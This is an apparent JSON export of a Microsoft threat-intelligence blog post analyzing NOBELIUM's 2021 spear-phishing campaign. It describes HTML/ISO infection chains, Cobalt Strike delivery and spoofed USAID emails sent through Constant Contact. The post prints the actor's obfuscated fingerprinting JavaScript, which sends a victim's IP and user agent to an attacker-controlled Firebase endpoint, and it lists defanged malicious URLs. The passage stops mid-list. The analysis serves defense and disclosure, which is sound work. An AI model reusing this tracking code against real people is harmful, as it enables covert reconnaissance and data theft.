{"id":93630,"date":"2021-05-27T17:00:50","date_gmt":"2021-05-28T00:00:50","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/?p=93630"},"modified":"2023-08-02T11:45:05","modified_gmt":"2023-08-02T18:45:05","slug":"new-sophisticated-email-based-attack-from-nobelium","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/","title":{"rendered":"New sophisticated email-based attack from NOBELIUM"},"content":{"rendered":"

Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the SUNBURST backdoor<\/a>, TEARDROP malware<\/a>, GoldMax malware<\/a>, and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, the campaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, Constant Contact<\/a>, to masquerade as a US-based development organization and distribute malicious URLs to a wide variety of organizations and industry verticals.<\/p>\n

Microsoft is issuing this alert and new security research regarding this sophisticated email-based campaign that NOBELIUM has been operating<\/a> to help the industry understand and protect from this latest activity. Below, we have outlined attacker motives, malicious behavior, and best practices to protect against this attack. You can also find more information on the Microsoft On The Issues blog<\/a>.<\/p>\n

Note: This is an active incident. We will post more details here as they become available.<\/p>\n

Update [05\/28\/2021]<\/strong>: We published a new blog post detailing NOBELIUM’s latest early-stage toolset<\/a>, composed of four tools utilized in a unique infection chain: EnvyScout, BoomBox, NativeZone, and VaporRage. <\/em><\/p><\/blockquote>\n

NOBELIUM has historically targeted government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. With this latest attack, NOBELIUM attempted to target approximately 3,000 individual accounts across more than 150 organizations, employing an established pattern<\/a> of using unique infrastructure and tooling for each target, increasing their ability to remain undetected for a longer period of time.<\/p>\n

This new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that were obscured behind the mailing service\u2019s URL (many email and document services provide a mechanism to simplify the sharing of files, providing insights into who and when links are clicked). Due to the high volume of emails distributed in this campaign, automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy settings or prior to detections being in place.<\/p>\n

Microsoft 365 Defender<\/a> delivers coordinated defense against this threat. Microsoft Defender for Office 365<\/a> detects the malicious emails, and Microsoft Defender for Endpoint<\/a> detects the malware and malicious behaviors. Due to the fast-moving nature of this campaign and its perceived scope, Microsoft encourages organizations to investigate and monitor communications matching characteristics described in this report and take the actions described below in this article.<\/p>\n

We continue to see an increase in sophisticated and nation-state-sponsored attacks<\/a> and, as part of our ongoing threat research and efforts to protect customers, we will continue to provide guidance<\/a> to the security community on how to secure against and respond to these multi-dimensional attacks.<\/p>\n

Spear-phishing campaign delivers NOBELIUM payloads<\/h2>\n

The NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly from the NOBELIUM operations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion platform. It is likely that these observations represent changes in the actor\u2019s tradecraft and possible experimentation following widespread disclosures of previous incidents. <\/span><\/span><\/p>\n

Early testing and initial discovery<\/h3>\n

As part of the initial discovery of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the Google Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record attributes of those who accessed the URL. MSTIC traced the start of this campaign to January 28, 2021, when the actor was seemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging Firebase URLs to record targets who clicked. No delivery of a malicious payload was observed during this early activity.<\/p>\n

Evolving delivery techniques<\/h3>\n

In the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file to disc and encouraged the target to open it, resulting in the ISO file being mounted much like an external or network drive. From here, a shortcut file (LNK) would execute an accompanying DLL, which would result in Cobalt Strike Beacon executing on the system.<\/p>\n

\"Example<\/p>\n

Figure 1. Example Flow of HMTL\/ISO infection chain.<\/em><\/p>\n

Here’s an example of target fingerprinting code leveraging Firebase:<\/p>\n

try {
\nlet sdfgfghj = '';
\nlet kjhyui = new XMLHttpRequest();
\nkjhyui.open('GET', 'https:\/\/api.ipify.org\/?format=jsonp?callback=?', false);
\nkjhyui.onreadystatechange = function (){
\nsdfgfghj = this.responseText;
\n}
\nkjhyui.send(null);
\nlet ioiolertsfsd = navigator.userAgent;
\nlet uyio = window.location.pathname.replace('\/','');
\nvar ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj};
\nctryur = JSON.stringify(ctryur);
\nlet sdfghfgh = new XMLHttpRequest();
\nsdfghfgh.open('POST', 'https:\/\/eventbrite-com-default-rtdb.firebaseio.com\/root.json', false);
\nsdfghfgh.setRequestHeader('Content-Type', 'application\https://www.microsoft.com/json');
\nsdfghfgh.send(ctryur);
\n} catch (e) {}<\/code><\/p>\n

Similar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the accompanying HTML document based on the intended target. MSTIC also observed the actor experimenting with removing the ISO from Firebase, and instead encoding it within the HTML document. Similarly, the actor experimented with redirecting the HTML document to an ISO, which contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying HTML in the phishing email and instead a URL led to an independent website spoofing the targeted organizations, from where the ISO was distributed.<\/p>\n

The phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.<\/p>\n

Escalated targeting and delivery<\/h3>\n

Experimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase, and no longer tracked users using a dedicated URL. Their techniques shifted to encode the ISO within the HTML document and have that responsible for storing target host details on a remote server via the use of the api.ipify.org<\/em> service. The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.<\/p>\n

In May 2021, the actor changed techniques once more by maintaining the HTML and ISO combination, but dropped a custom .NET first-stage implant, detected as TrojanDownloader:MSIL\/BoomBox, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.<\/p>\n

On May 25, the NOBELIUM campaign escalated significantly. Using the legitimate mass mailing service Constant Contact, NOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Due to the high-volume campaign, automated systems blocked most of the emails and marked them as spam. However, automated systems might have successfully delivered some of the earlier emails to recipients.<\/p>\n

In the May 25 campaign, there were several iterations. In one example the emails appear to originate from USAID <ashainfo@usaid.gov>,<\/em> while having an authentic sender email address that matches the standard Constant Contact service. This address (which varies for each recipient) ends in @in.constantcontact.com<\/em>, and (which varies for each recipient), and a Reply-To address of <mhillary@usaid.gov><\/em> was observed. The emails pose as an alert from USAID, as seen below.<\/p>\n

\"Example<\/p>\n

Figure 2. Example email screenshot.<\/em><\/p>\n

If the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service, which follows this pattern:<\/p>\n

https:\/\/r20.rs6[.]net\/tn.jsp?f=<\/em><\/p>\n

The user is then redirected to NOBELIUM-controlled infrastructure, with a URL following this pattern:<\/p>\n

https:\/\/usaid.theyardservice[.]com\/d\/<target_email_address><\/em><\/p>\n

A malicious ISO file is then delivered to the system. Within this ISO file are the following files that are saved in the %USER%\\<\/em>AppData\\Local\\Temp\\<random folder name>\\<\/em> path:<\/p>\n